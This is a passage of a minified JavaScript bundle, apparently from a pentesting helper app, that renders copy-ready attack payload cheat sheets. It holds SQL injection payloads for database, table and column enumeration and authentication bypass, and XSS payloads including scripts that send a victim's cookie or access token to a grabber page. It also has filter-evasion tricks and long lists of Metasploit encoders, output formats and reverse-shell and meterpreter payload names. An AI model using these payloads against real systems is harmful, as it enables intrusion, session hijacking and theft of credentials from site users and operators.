-"}].map(((e,t)=>n.default.createElement(n.default.Fragment,null,n.default.createElement(o,{key:t},n.default.createElement(u,{href:`#${e.db_type}`},e.db_type)),n.default.createElement(o,{key:t},n.default.createElement("pre",null,n.default.createElement(c,{copyable:!0},e.title))))))),n.default.createElement(r.Divider,{dashed:!0}),n.default.createElement("div",{style:{padding:10,marginTop:15},key:"a"},n.default.createElement(i,{level:3},"Database enumeration"),[{db_type:"MySQL/MSSQL",title:"' UNION SELECT @@version -- -"},{db_type:"Oracle",title:"' UNION SELECT banner from v$version -- -"},{db_type:"Oracle(2nd method)",title:"' UNION SELECT version from v$instance -- -"},{db_type:"Postgres",title:"' UNION SELECT version() -- -"}].map(((e,t)=>n.default.createElement(n.default.Fragment,null,n.default.createElement(o,{key:t},n.default.createElement(u,{href:`#${e.db_type}`},e.db_type)),n.default.createElement(o,{key:t},n.default.createElement("pre",null,n.default.createElement(c,{copyable:!0},e.title))))))),n.default.createElement(r.Divider,{dashed:!0}),n.default.createElement("div",{style:{padding:10,marginTop:15},key:"a"},n.default.createElement(i,{level:3},"Tablename enumeration"),[{db_type:"MySQL/MSSQL/Postgres",title:"' UNION SELECT table_name,NULL from INFORMATION_SCHEMA.TABLES -- -"},{db_type:"Oracle",title:"' UNION SELECT table_name,NULL FROM all_tables -- -"}].map(((e,t)=>n.default.createElement(n.default.Fragment,null,n.default.createElement(o,{key:t},n.default.createElement(u,{href:`#${e.db_type}`},e.db_type)),n.default.createElement(o,{key:t},n.default.createElement("pre",null,n.default.createElement(c,{copyable:!0},e.title))))))),n.default.createElement(r.Divider,{dashed:!0}),n.default.createElement("div",{style:{padding:10,marginTop:15},key:"a"},n.default.createElement(i,{level:3},"Column name enumeration"),[{db_type:"MySQL/MSSQL/Postgres",title:'\' UNION SELECT column_name,NULL from INFORMATION_SCHEMA.COLUMNS where table_name="X" -- -'},{db_type:"Oracle",title:'\' UNION SELECT column_name,NULL FROM all_tab_columns where table_name="X" -- -'}].map(((e,t)=>n.default.createElement(n.default.Fragment,null,n.default.createElement(o,{key:t},n.default.createElement(u,{href:`#${e.db_type}`},e.db_type)),n.default.createElement(o,{key:t},n.default.createElement("pre",null,n.default.createElement(c,{copyable:!0},e.title))))))),n.default.createElement(r.Divider,{dashed:!0}),n.default.createElement("div",{style:{padding:10,marginTop:15},key:"a"},n.default.createElement(i,{level:3},"Column values concatenation"),[{db_type:"MySQL/Postgres",title:"' UNION SELECT concat(col1,':',col2) from table_name limit 1 -- -"},{db_type:"MySQL(2nd method)",title:"' UNION SELECT col1 ':' col2 from table_name limit 1 -- -"},{db_type:"Oracle / Postgres",title:"' UNION SELECT select col1 ||':'||col2, null FROM where table_name=\"X\" -- -"},{db_type:"MSSQL",title:"' UNION SELECT col1+':'+col2,NULL from table_name limit 1 -- -"}].map(((e,t)=>n.default.createElement(n.default.Fragment,null,n.default.createElement(o,{key:t},n.default.createElement(u,{href:`#${e.db_type}`},e.db_type)),n.default.createElement(o,{key:t},n.default.createElement("pre",null,n.default.createElement(c,{copyable:!0},e.title))))))),n.default.createElement(r.Divider,{dashed:!0}),n.default.createElement("div",{style:{padding:10,marginTop:15},key:"a"},n.default.createElement(i,{level:3},"Conditional ( Error Based ) "),e.map(((e,t)=>n.default.createElement(n.default.Fragment,null,n.default.createElement(o,{key:t},n.default.createElement(u,{href:`#${e.db_type}`},e.db_type)),n.default.createElement(o,{key:t},n.default.createElement("pre",null,n.default.createElement(c,{copyable:!0},e.title))))))),n.default.createElement(r.Divider,{dashed:!0}),n.default.createElement("div",{key:"b",style:{padding:15,marginTop:15}},n.default.createElement(i,{level:3},"Time-Based"),[{title:",(select * from (select(sleep(10)))a)"},{title:"';WAITFOR DELAY '0:0:30'--"}].map(((e,t)=>n.default.createElement(o,{key:t},n.default.createElement("pre",null,n.default.createElement(c,{copyable:!0},e.title)))))),n.default.createElement(r.Divider,{dashed:!0}),n.default.createElement("div",{key:"c",style:{padding:15,marginTop:15}},n.default.createElement(i,{level:3},"Generic Error Based Payloads"),e.map(((e,t)=>n.default.createElement(o,{key:t},n.default.createElement(u,null,e.db_type),n.default.createElement("pre",null,n.default.createElement(c,{copyable:!0},e.title)))))),n.default.createElement(r.Divider,{dashed:!0}),n.default.createElement("div",{key:"d",style:{padding:15,marginTop:15}},n.default.createElement(i,{level:3},"Authentication Based Payloads"),[{title:"or true--"},{title:'") or true--'},{title:"') or true--"},{title:"admin') or ('1'='1'--"},{title:"admin') or ('1'='1'#"},{title:"admin') or ('1'='1'/"}].map(((e,t)=>n.default.createElement(o,{key:t},n.default.createElement("pre",null,n.default.createElement(c,{copyable:!0},e.title)))))),n.default.createElement(r.Divider,{dashed:!0}),n.default.createElement("div",{key:"e",style:{padding:15,marginTop:15}},n.default.createElement(i,{level:3},"Order by and UNION Based Payloads"),[{title:"1' ORDER BY 1--+"},{title:"1' ORDER BY 2--+"},{title:"1' ORDER BY 3--+"},{title:"1' ORDER BY 1,2--+"},{title:"1' ORDER BY 1,2,3--+"},{title:"1' GROUP BY 1,2,--+"},{title:"1' GROUP BY 1,2,3--+"},{title:"' GROUP BY columnnames having 1=1 --"},{title:"-1' UNION SELECT 1,2,3--+"},{title:"' UNION SELECT sum(columnname ) from tablename --"},{title:"-1 UNION SELECT 1 INTO @,@"},{title:"-1 UNION SELECT 1 INTO @,@,@"},{title:"1 AND (SELECT * FROM Users) = 1\t"},{title:"' AND MID(VERSION(),1,1) = '5';"},{title:"' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --"}].map(((e,t)=>n.default.createElement(o,{key:t},n.default.createElement("pre",null,n.default.createElement(c,{copyable:!0},e.title)))))))}},36865:function(e,t,l){"use strict";var a=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0});const n=a(l(50959)),r=l(35401),{Title:i,Paragraph:o,Text:c}=r.Typography;t.default=function(){return n.default.createElement("div",null,n.default.createElement(i,{level:2,style:{fontWeight:"bold",margin:15}},"Cross Site Scripting (XSS)"),n.default.createElement(o,{style:{margin:15}},"Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user."),n.default.createElement(o,{style:{marginLeft:15}},"Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it."),n.default.createElement(r.Divider,{orientation:"center"},"Data grabber for XSS"),n.default.createElement("div",{key:"a",style:{padding:15}},n.default.createElement(o,null,"Obtains the administrator cookie or sensitive access token, the following payload will send it to a controlled page."),[{title:"<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie<\/script>"},{title:"<script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')<\/script>"},{title:"<script>new Image().src='http://localhost/cookie.php?c='+document.cookie;<\/script>"},{title:"<script>new Image().src='http://localhost/cookie.php?c='+localStorage.getItem('access_token');<\/script>"}].map(((e,t)=>n.default.createElement(o,{key:t},n.default.createElement("pre",null,n.default.createElement(c,{copyable:!0},e.title)))))),n.default.createElement(r.Divider,{orientation:"center"},"XSS in HTML/Applications"),n.default.createElement("div",{key:"b",style:{padding:15}},[{title:"<script>alert('XSS')<\/script>"},{title:"<scr<script>ipt>alert('XSS')</scr<script>ipt>"},{title:'"><script>alert("XSS")<\/script>'},{title:'"><script>alert(String.fromCharCode(88,83,83))<\/script>'}].map(((e,t)=>n.default.createElement(o,{key:t},n.default.createElement("pre",null,n.default.createElement(c,{copyable:!0},e.title))))),[{title:"<img src=x onerror=alert('XSS');>"},{title:"<img src=x onerror=alert('XSS')//"},{title:"<img src=x onerror=alert(String.fromCharCode(88,83,83));>"},{title:"<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>"},{title:"<img src=x:alert(alt) onerror=eval(src) alt=xss>"},{title:'"><img src=x onerror=alert("XSS");>'},{title:'"><img src=x onerror=alert(String.fromCharCode(88,83,83));>'}].map(((e,t)=>n.default.createElement(o,{key:t},n.default.createElement("pre",null,n.default.createElement(c,{copyable:!0},e.title)))))),n.default.createElement(r.Divider,{orientation:"center"},"XSS in Markdown"),n.default.createElement("div",{key:"c",style:{padding:15}},[{title:"[a](javascript:prompt(document.cookie))"},{title:"[a](j a v a s c r i p t:prompt(document.cookie))"},{title:"[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)"},{title:"[a](javascript:window.onerror=alert;throw%201)"}].map(((e,t)=>n.default.createElement(o,{key:t},n.default.createElement("pre",null,n.default.createElement(c,{copyable:!0},e.title)))))),n.default.createElement(r.Divider,{orientation:"center"},"XSS in SVG (short)"),n.default.createElement("div",{key:"d",style:{padding:15}},[{title:"<svg xmlns='http://www.w3.org/2000/svg' onload='alert(document.domain)'/>"},{title:"<svg><desc><![CDATA[</desc><script>alert(1)<\/script>]]></svg>"},{title:"<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)<\/script>]]></svg>"},{title:"<svg><title><![CDATA[</title><script>alert(3)<\/script>]]></svg>"}].map(((e,t)=>n.default.createElement(o,{key:t},n.default.createElement("pre",null,n.default.createElement(c,{copyable:!0},e.title)))))),n.default.createElement(r.Divider,{orientation:"center"},"Bypass word blacklist with code evaluation"),n.default.createElement("div",{key:"e",style:{padding:15}},[{title:"eval('ale'+'rt(0)');"},{title:"Function('ale'+'rt(1)')();"},{title:"new Function`alert`6``;"},{title:"setTimeout('ale'+'rt(2)');"},{title:"setInterval('ale'+'rt(10)');"},{title:"Set.constructor('ale'+'rt(13)')();"},{title:"Set.constructor`alert(14)```;"}].map(((e,t)=>n.default.createElement(o,{key:t},n.default.createElement("pre",null,n.default.createElement(c,{copyable:!0},e.title)))))))}},86010:function(){},10565:function(e){"use strict";e.exports=JSON.parse('[{"value":"cmd/echo"},{"value":"cmd/generic_sh"},{"value":"cmd/ifs"},{"value":"cmd/perl"},{"value":"cmd/powershell_base64"},{"value":"cmd/printf_php_mq"},{"value":"generic/eicar"},{"value":"generic/none"},{"value":"mipsbe/byte_xori"},{"value":"mipsbe/longxor"},{"value":"mipsle/byte_xori"},{"value":"mipsle/longxor"},{"value":"php/base64"},{"value":"ppc/longxor"},{"value":"ppc/longxor_tag"},{"value":"ruby/base64"},{"value":"sparc/longxor_tag"},{"value":"x64/xor"},{"value":"x64/zutto_dekiru"},{"value":"x86/add_sub"},{"value":"x86/alpha_mixed"},{"value":"x86/alpha_upper"},{"value":"x86/avoid_underscore_tolower"},{"value":"x86/avoid_utf8_tolower"},{"value":"x86/bloxor"},{"value":"x86/bmp_polyglot"},{"value":"x86/call4_dword_xor"},{"value":"x86/context_cpuid"},{"value":"x86/context_stat"},{"value":"x86/context_time"},{"value":"x86/countdown"},{"value":"x86/fnstenv_mov"},{"value":"x86/jmp_call_additive"},{"value":"x86/nonalpha"},{"value":"x86/nonupper"},{"value":"x86/opt_sub"},{"value":"x86/service"},{"value":"x86/shikata_ga_nai"},{"value":"x86/single_static_bit"},{"value":"x86/unicode_mixed"},{"value":"x86/unicode_upper"}]')},37299:function(e){"use strict";e.exports=JSON.parse('[{"value":"asp"},{"value":"aspx"},{"value":"aspx-exe"},{"value":"axis2"},{"value":"bash"},{"value":"c"},{"value":"csharp"},{"value":"dll"},{"value":"dw"},{"value":"dword"},{"value":"elf"},{"value":"elf-so"},{"value":"exe"},{"value":"exe-only"},{"value":"exe-service"},{"value":"exe-small"},{"value":"hex"},{"value":"hta-psh"},{"value":"jar"},{"value":"java"},{"value":"js_be"},{"value":"js_le"},{"value":"jsp"},{"value":"loop-vbs"},{"value":"macho"},{"value":"msi"},{"value":"msi-nouac"},{"value":"num"},{"value":"osx-app"},{"value":"perl"},{"value":"pl"},{"value":"powershell"},{"value":"ps1"},{"value":"psh"},{"value":"psh-cmd"},{"value":"psh-net"},{"value":"psh-reflection"},{"value":"py"},{"value":"python"},{"value":"raw"},{"value":"rb"},{"value":"ruby"},{"value":"sh"},{"value":"vba"},{"value":"vba-exe"},{"value":"vbapplication"},{"value":"vba-psh"},{"value":"vbs"},{"value":"vbscript"},{"value":"war"}]')},70746:function(e){"use strict";e.exports=JSON.parse('[{"value":"aix/ppc/shell_bind_tcp"},{"value":"aix/ppc/shell_find_port"},{"value":"aix/ppc/shell_interact"},{"value":"aix/ppc/shell_reverse_tcp"},{"value":"android/meterpreter/reverse_http"},{"value":"android/meterpreter/reverse_https"},{"value":"android/meterpreter/reverse_tcp"},{"value":"android/meterpreter_reverse_http"},{"value":"android/meterpreter_reverse_https"},{"value":"android/meterpreter_reverse_tcp"},{"value":"android/shell/reverse_http"},{"value":"android/shell/reverse_https"},{"value":"android/shell/reverse_tcp"},{"value":"apple_ios/aarch64/meterpreter_reverse_http"},{"value":"apple_ios/aarch64/meterpreter_reverse_https"},{"value":"apple_ios/aarch64/meterpreter_reverse_tcp"},{"value":"apple_ios/aarch64/shell_reverse_tcp"},{"value":"bsd/sparc/shell_bind_tcp"},{"value":"bsd/sparc/shell_reverse_tcp"},{"value":"bsd/x64/exec"},{"value":"bsd/x64/shell_bind_ipv6_tcp"},{"value":"bsd/x64/shell_bind_tcp"},{"value":"bsd/x64/shell_bind_tcp_small"},{"value":"bsd/x64/shell_reverse_ipv6_tcp"},{"value":"bsd/x64/shell_reverse_tcp"},{"value":"bsd/x64/shell_reverse_tcp_small"},{"value":"bsd/x86/exec"},{"value":"bsd/x86/metsvc_bind_tcp"},{"value":"bsd/x86/metsvc_reverse_tcp"},{"value":"bsd/x86/shell/bind_ipv6_tcp"},{"value":"bsd/x86/shell/bind_tcp"},{"value":"bsd/x86/shell/find_tag"},{"value":"bsd/x86/shell/reverse_ipv6_tcp"},{"value":"bsd/x86/shell/reverse_tcp"},{"value":"bsd/x86/shell_bind_tcp"},{"value":"bsd/x86/shell_bind_tcp_ipv6"},{"value":"bsd/x86/shell_find_port"},{"value":"bsd/x86/shell_find_tag"},{"value":"bsd/x86/shell_reverse_tcp"},{"value":"bsd/x86/shell_reverse_tcp_ipv6"},{"value":"bsdi/x86/shell/bind_tcp"},{"value":"bsdi/x86/shell/reverse_tcp"},{"value":"bsdi/x86/shell_bind_tcp"},{"value":"bsdi/x86/shell_find_port"},{"value":"bsdi/x86/shell_reverse_tcp"},{"value":"cmd/mainframe/apf_privesc_jcl"},{"value":"cmd/mainframe/bind_shell_jcl"},{"value":"cmd/mainframe/generic_jcl"},{"value":"cmd/mainframe/reverse_shell_jcl"},{"value":"cmd/unix/bind_awk"},{"value":"cmd/unix/bind_inetd"},{"value":"cmd/unix/bind_lua"},{"value":"cmd/unix/bind_netcat"},{"value":"cmd/unix/bind_netcat_gaping"},{"value":"cmd/unix/bind_netcat_gaping_ipv6"},{"value":"cmd/unix/bind_nodejs"},{"value":"cmd/unix/bind_perl"},{"value":"cmd/unix/bind_perl_ipv6"},{"value":"cmd/unix/bind_r"},{"value":"cmd/unix/bind_ruby"},{"value":"cmd/unix/bind_ruby_ipv6"},{"value":"cmd/unix/bind_socat_udp"},{"value":"cmd/unix/bind_stub"},{"value":"cmd/unix/bind_zsh"},{"value":"cmd/unix/generic"},{"value":"cmd/unix/interact"},{"value":"cmd/unix/reverse"},{"value":"cmd/unix/reverse_awk"},{"value":"cmd/unix/reverse_bash"},{"value":"cmd/unix/reverse_bash_telnet_ssl"},{"value":"cmd/unix/reverse_ksh"},{"value":"cmd/unix/reverse_lua"},{"value":"cmd/unix/reverse_ncat_ssl"},{"value":"cmd/unix/reverse_netcat"},{"value":"cmd/unix/reverse_netcat_gaping"},{"value":"cmd/unix/reverse_nodejs"},{"value":"cmd/unix/reverse_openssl"},{"value":"cmd/unix/reverse_perl"},{"value":"cmd/unix/reverse_perl_ssl"},{"value":"cmd/unix/reverse_php_ssl"},{"value":"cmd/unix/reverse_python"},{"value":"cmd/unix/reverse_python_ssl"},{"value":"cmd/unix/reverse_r"},{"value":"cmd/unix/reverse_ruby"},{"value":"cmd/unix/reverse_ruby_ssl"},{"value":"cmd/unix/reverse_socat_udp"},{"value":"cmd/unix/reverse_ssl_double_telnet"},{"value":"cmd/unix/reverse_stub"},{"value":"cmd/unix/reverse_zsh"},{"value":"cmd/windows/adduser"},{"value":"cmd/windows/bind_lua"},{"value":"cmd/windows/bind_perl"},{"value":"cmd/windows/bind_perl_ipv6"},{"value":"cmd/windows/bind_ruby"},{"value":"cmd/windows/download_eval_vbs"},{"value":"cmd/windows/download_exec_vbs"},{"value":"cmd/windows/generic"},{"value":"cmd/windows/powershell_bind_tcp"},{"value":"cmd/windows/powershell_reverse_tcp"},{"value":"cmd/windows/reverse_lua"},{"value":"cmd/windows/reverse_perl"},{"value":"cmd/windows/reverse_powershell"},{"value":"cmd/windows/reverse_ruby"},{"value":"firefox/exec"},{"value":"firefox/shell_bind_tcp"},{"value":"firefox/shell_reverse_tcp"},{"value":"generic/custom"},{"value":"generic/debug_trap"},{"value":"generic/shell_bind_tcp"},{"value":"generic/shell_reverse_tcp"},{"value":"generic/tight_loop"},{"value":"java/jsp_shell_bind_tcp"},{"value":"java/jsp_shell_reverse_tcp"},{"value":"java/meterpreter/bind_tcp"},{"value":"java/meterpreter/reverse_http"},{"value":"java/meterpreter/reverse_https"},{"value":"java/meterpreter/reverse_tcp"},{"value":"java/shell/bind_tcp"},{"value":"java/shell/reverse_tcp"},{"value":"java/shell_reverse_tcp"},{"value":"linux/aarch64/meterpreter/reverse_tcp"},{"value":"linux/aarch64/meterpreter_reverse_http"},{"value":"linux/aarch64/meterpreter_reverse_https"},{"value":"linux/aarch64/meterpreter_reverse_tcp"},{"value":"linux/aarch64/shell/reverse_tcp"},{"value":"linux/aarch64/shell_reverse_tcp"},{"value":"linux/armbe/meterpreter_reverse_http"},{"value":"linux/armbe/meterpreter_reverse_https"},{"value":"linux/armbe/meterpreter_reverse_tcp"},{"value":"linux/armbe/shell_bind_tcp"},{"value":"linux/armle/adduser"},{"value":"linux/armle/exec"},{"value":"linux/armle/meterpreter/bind_tcp"},{"value":"linux/armle/meterpreter/reverse_tcp"},{"value":"linux/armle/meterpreter_reverse_http"},{"value":"linux/armle/meterpreter_reverse_https"},{"value":"linux/armle/meterpreter_reverse_tcp"},{"value":"linux/armle/shell/bind_tcp"},{"value":"linux/armle/shell/reverse_tcp"},{"value":"linux/armle/shell_bind_tcp"},{"value":"linux/armle/shell_reverse_tcp"},{"value":"linux/mips64/meterpreter_reverse_http"},{"value":"linux/mips64/meterpreter_reverse_https"},{"value":"linux/mips64/meterpreter_reverse_tcp"},{"value":"linux/mipsbe/exec"},{"value":"linux/mipsbe/meterpreter/reverse_tcp"},{"value":"linux/mipsbe/meterpreter_reverse_http"},{"value":"linux/mipsbe/meterpreter_reverse_https"},{"value":"linux/mipsbe/meterpreter_reverse_tcp"},{"value":"linux/mipsbe/reboot"},{"value":"linux/mipsbe/shell/reverse_tcp"},{"value":"linux/mipsbe/shell_bind_tcp"},{"value":"linux/mipsbe/shell_reverse_tcp"},{"value":"linux/mipsle/exec"},{"value":"linux/mipsle/meterpreter/reverse_tcp"},{"value":"linux/mipsle/meterpreter_reverse_http"},{"value":"linux/mipsle/meterpreter_reverse_https"},{"value":"linux/mipsle/meterpreter_reverse_tcp"},{"value":"linux/mipsle/reboot"},{"value":"linux/mipsle/shell/reverse_tcp"},{"value":"linux/mipsle/shell_bind_tcp"},{"value":"linux/mipsle/shell_reverse_tcp"},{"value":"linux/ppc/meterpreter_reverse_http"},{"value":"linux/ppc/meterpreter_reverse_https"},{"value":"linux/ppc/meterpreter_reverse_tcp"},{"value":"linux/ppc/shell_bind_tcp"},{"value":"linux/ppc/shell_find_port"},{"value":"linux/ppc/shell_reverse_tcp"},{"value":"linux/ppc64/shell_bind_tcp"},{"value":"linux/ppc64/shell_find_port"},{"value":"linux/ppc64/shell_reverse_tcp"},{"value":"linux/ppc64le/meterpreter_reverse_http"},{"value":"linux/ppc64le/meterpreter_reverse_https"},{"value":"linux/ppc64le/meterpreter_reverse_tcp"},{"value":"linux/ppce500v2/meterpreter_reverse_http"},{"value":"linux/ppce500v2/meterpreter_reverse_https"},{"value":"linux/ppce500v2/meterpreter_reverse_tcp"},{"value":"linux/x64/exec"},{"value":"linux/x64/meterpreter/bind_tcp"},{"value":"linux/x64/meterpreter/reverse_tcp"},{"value":"linux/x64/meterpreter_reverse_http"},{"value":"linux/x64/meterpreter_reverse_https"},{"value":"linux/x64/meterpreter_reverse_tcp"},{"value":"linux/x64/shell/bind_tcp"},{"value":"linux/x64/shell/reverse_tcp"},{"value":"linux/x64/shell_bind_tcp"},{"value":"linux/x64/shell_bind_tcp_random_port"},{"value":"linux/x64/shell_find_port"},{"value":"linux/x64/shell_reverse_tcp"},{"value":"linux/x86/adduser"},{"value":"linux/x86/chmod"},{"value":"linux/x86/exec"},{"value":"linux/x86/meterpreter/bind_ipv6_tcp"},{"value":"linux/x86/meterpreter/bind_ipv6_tcp_uuid"},{"value":"linux/x86/meterpreter/bind_nonx_tcp"},{"value":"linux/x86/meterpreter/bind_tcp"},{"value":"linux/x86/meterpreter/bind_tcp_uuid"},{"value":"linux/x86/meterpreter/find_tag"},{"value":"linux/x86/meterpreter/reverse_ipv6_tcp"},{"value":"linux/x86/meterpreter/reverse_nonx_tcp"},{"value":"linux/x86/meterpreter/reverse_tcp"},{"value":"linux/x86/meterpreter/reverse_tcp_uuid"},{"value":"linux/x86/meterpreter_reverse_http"},{"value":"linux/x86/meterpreter_reverse_https"},{"value":"linux/x86/meterpreter_reverse_tcp"},{"value":"linux/x86/metsvc_bind_tcp"},{"value":"linux/x86/metsvc_reverse_tcp"},{"value":"linux/x86/read_file"},{"value":"linux/x86/shell/bind_ipv6_tcp"},{"value":"linux/x86/shell/bind_ipv6_tcp_uuid"},{"value":"linux/x86/shell/bind_nonx_tcp"},{"value":"linux/x86/shell/bind_tcp"},{"value":"linux/x86/shell/bind_tcp_uuid"},{"value":"linux/x86/shell/find_tag"},{"value":"linux/x86/shell/reverse_ipv6_tcp"},{"value":"linux/x86/shell/reverse_nonx_tcp"},{"value":"linux/x86/shell/reverse_tcp"},{"value":"linux/x86/shell/reverse_tcp_uuid"},{"value":"linux/x86/shell_bind_ipv6_tcp"},{"value":"linux/x86/shell_bind_tcp"},{"value":"linux/x86/shell_bind_tcp_random_port"},{"value":"linux/x86/shell_find_port"},{"value":"linux/x86/shell_find_tag"},{"value":"linux/x86/shell_reverse_tcp"},{"value":"linux/x86/shell_reverse_tcp_ipv6"},{"value":"linux/zarch/meterpreter_reverse_http"},{"value":"linux/zarch/meterpreter_reverse_https"},{"value":"linux/zarch/meterpreter_reverse_tcp"},{"value":"mainframe/shell_reverse_tcp"},{"value":"multi/meterpreter/reverse_http"},{"value":"multi/meterpreter/reverse_https"},{"value":"netware/shell/reverse_tcp"},{"value":"nodejs/shell_bind_tcp"},{"value":"nodejs/shell_reverse_tcp"},{"value":"nodejs/shell_reverse_tcp_ssl"},{"value":"osx/armle/execute/bind_tcp"},{"value":"osx/armle/execute/reverse_tcp"},{"value":"osx/armle/shell/bind_tcp"},{"value":"osx/armle/shell/reverse_tcp"},{"value":"osx/armle/shell_bind_tcp"},{"value":"osx/armle/shell_reverse_tcp"},{"value":"osx/armle/vibrate"},{"value":"osx/ppc/shell/bind_tcp"},{"value":"osx/ppc/shell/find_tag"},{"value":"osx/ppc/shell/reverse_tcp"},{"value":"osx/ppc/shell_bind_tcp"},{"value":"osx/ppc/shell_reverse_tcp"},{"value":"osx/x64/dupandexecve/bind_tcp"},{"value":"osx/x64/dupandexecve/reverse_tcp"},{"value":"osx/x64/exec"},{"value":"osx/x64/meterpreter/bind_tcp"},{"value":"osx/x64/meterpreter/reverse_tcp"},{"value":"osx/x64/meterpreter_reverse_http"},{"value":"osx/x64/meterpreter_reverse_https"},{"value":"osx/x64/meterpreter_reverse_tcp"},{"value":"osx/x64/say"},{"value":"osx/x64/shell_bind_tcp"},{"value":"osx/x64/shell_find_tag"},{"value":"osx/x64/shell_reverse_tcp"},{"value":"osx/x86/bundleinject/bind_tcp"},{"value":"osx/x86/bundleinject/reverse_tcp"},{"value":"osx/x86/exec"},{"value":"osx/x86/isight/bind_tcp"},{"value":"osx/x86/isight/reverse_tcp"},{"value":"osx/x86/shell_bind_tcp"},{"value":"osx/x86/shell_find_port"},{"value":"osx/x86/shell_reverse_tcp"},{"value":"osx/x86/vforkshell/bind_tcp"},{"value":"osx/x86/vforkshell/reverse_tcp"},{"value":"osx/x86/vforkshell_bind_tcp"},{"value":"osx/x86/vforkshell_reverse_tcp"},{"value":"php/bind_perl"},{"value":"php/bind_perl_ipv6"},{"value":"php/bind_php"},{"value":"php/bind_php_ipv6"},{"value":"php/download_exec"},{"value":"php/exec"},{"value":"php/meterpreter/bind_tcp"},{"value":"php/meterpreter/bind_tcp_ipv6"},{"value":"php/meterpreter/bind_tcp_ipv6_uuid"},{"value":"php/meterpreter/bind_tcp_uuid"},{"value":"php/meterpreter/reverse_tcp"},{"value":"php/meterpreter/reverse_tcp_uuid"},{"value":"php/meterpreter_reverse_tcp"},{"value":"php/reverse_perl"},{"value":"php/reverse_php"},{"value":"php/shell_findsock"},{"value":"python/meterpreter/bind_tcp"},{"value":"python/meterpreter/bind_tcp_uuid"},{"value":"python/meterpreter/reverse_http"},{"value":"python/meterpreter/reverse_https"},{"value":"python/meterpreter/reverse_tcp"},{"value":"python/meterpreter/reverse_tcp_ssl"},{"value":"python/meterpreter/reverse_tcp_uuid"},{"value":"python/meterpreter_bind_tcp"},{"value":"python/meterpreter_reverse_http"},{"value":"python/meterpreter_reverse_https"},{"value":"python/meterpreter_reverse_tcp"},{"value":"python/shell_bind_tcp"},{"value":"python/shell_reverse_tcp"},{"value":"python/shell_reverse_tcp_ssl"},{"value":"python/shell_reverse_udp"},{"value":"r/shell_bind_tcp"},{"value":"r/shell_reverse_tcp"},{"value":"ruby/shell_bind_tcp"},{"value":"ruby/shell_bind_tcp_ipv6"},{"value":"ruby/shell_reverse_tcp"},{"value":"ruby/shell_reverse_tcp_ssl"},{"value":"solaris/sparc/shell_bind_tcp"},{"value":"solaris/sparc/shell_find_port"},{"value":"solaris/sparc/shell_reverse_tcp"},{"value":"solaris/x86/shell_bind_tcp"},{"value":"solaris/x86/shell_find_port"},{"value":"solaris/x86/shell_reverse_tcp"},{"value":"tty/unix/interact"},{"value":"windows/adduser"},{"value":"windows/dllinject/bind_hidden_ipknock_tcp"},{"value":"windows/dllinject/bind_hidden_tcp"},{"value":"windows/dllinject/bind_ipv6_tcp"},{"value":"windows/dllinject/bind_ipv6_tcp_uuid"},{"value":"windows/dllinject/bind_named_pipe"},{"value":"windows/dllinject/bind_nonx_tcp"},{"value":"windows/dllinject/bind_tcp"},{"value":"windows/dllinject/bind_tcp_rc4"},{"value":"windows/dllinject/bind_tcp_uuid"},{"value":"windows/dllinject/find_tag"},{"value":"windows/dllinject/reverse_hop_http"},{"value":"windows/dllinject/reverse_http"},{"value":"windows/dllinject/reverse_http_proxy_pstore"},{"value":"windows/dllinject/reverse_ipv6_tcp"},{"value":"windows/dllinject/reverse_nonx_tcp"},{"value":"windows/dllinject/reverse_ord_tcp"},{"value":"windows/dllinject/reverse_tcp"},{"value":"windows/dllinject/reverse_tcp_allports"},{"value":"windows/dllinject/reverse_tcp_dns"},{"value":"windows/dllinject/reverse_tcp_rc4"},{"value":"windows/dllinject/reverse_tcp_rc4_dns"},{"value":"windows/dllinject/reverse_tcp_uuid"},{"value":"windows/dllinject/reverse_udp"},{"value":"windows/dllinject/reverse_winhttp"},{"value":"windows/dns_txt_query_exec"},{"value":"windows/download_exec"},{"value":"windows/exec"},{"value":"windows/format_all_drives"},{"value":"windows/loadlibrary"},{"value":"windows/messagebox"},{"value":"windows/meterpreter/bind_hidden_ipknock_tcp"},{"value":"windows/meterpreter/bind_hidden_tcp"},{"value":"windows/meterpreter/bind_ipv6_tcp"},{"value":"windows/meterpreter/bind_ipv6_tcp_uuid"},{"value":"windows/meterpreter/bind_named_pipe"},{"value":"windows/meterpreter/bind_nonx_tcp"},{"value":"windows/meterpreter/bind_tcp"},{"value":"windows/meterpreter/bind_tcp_rc4"},{"value":"windows/meterpreter/bind_tcp_uuid"},{"value":"windows/meterpreter/find_tag"},{"value":"windows/meterpreter/reverse_hop_http"},{"value":"windows/meterpreter/reverse_http"},{"value":"windows/meterpreter/reverse_http_proxy_pstore"},{"value":"windows/meterpreter/reverse_https"},{"value":"windows/meterpreter/reverse_https_proxy"},{"value":"windows/meterpreter/reverse_ipv6_tcp"},{"value":"windows/meterpreter/reverse_named_pipe"},{"value":"windows/meterpreter/reverse_nonx_tcp"},{"value":"windows/meterpreter/reverse_ord_tcp"},{"value":"windows/meterpreter/reverse_tcp"},{"value":"windows/meterpreter/reverse_tcp_allports"},{"value":"windows/meterpreter/reverse_tcp_dns"},{"value":"windows/meterpreter/reverse_tcp_rc4"},{"value":"windows/meterpreter/reverse_tcp_rc4_dns"},{"value":"windows/meterpreter/reverse_tcp_uuid"},{"value":"windows/meterpreter/reverse_udp"},{"value":"windows/meterpreter/reverse_winhttp"},{"value":"windows/meterpreter/reverse_winhttps"},{"value":"windows/meterpreter_bind_named_pipe"},{"value":"windows/meterpreter_bind_tcp"},{"value":"windows/meterpreter_reverse_http"},{"value":"windows/meterpreter_reverse_https"},{"value":"windows/meterpreter_reverse_ipv6_tcp"},{"value":"windows/meterpreter_reverse_tcp"},{"value":"windows/metsvc_bind_tcp"},{"value":"windows/metsvc_reverse_tcp"},{"value":"windows/patchupdllinject/bind_hidden_ipknock_tcp"},{"value":"windows/patchupdllinject/bind_hidden_tcp"},{"value":"windows/patchupdllinject/bind_ipv6_tcp"},{"value":"windo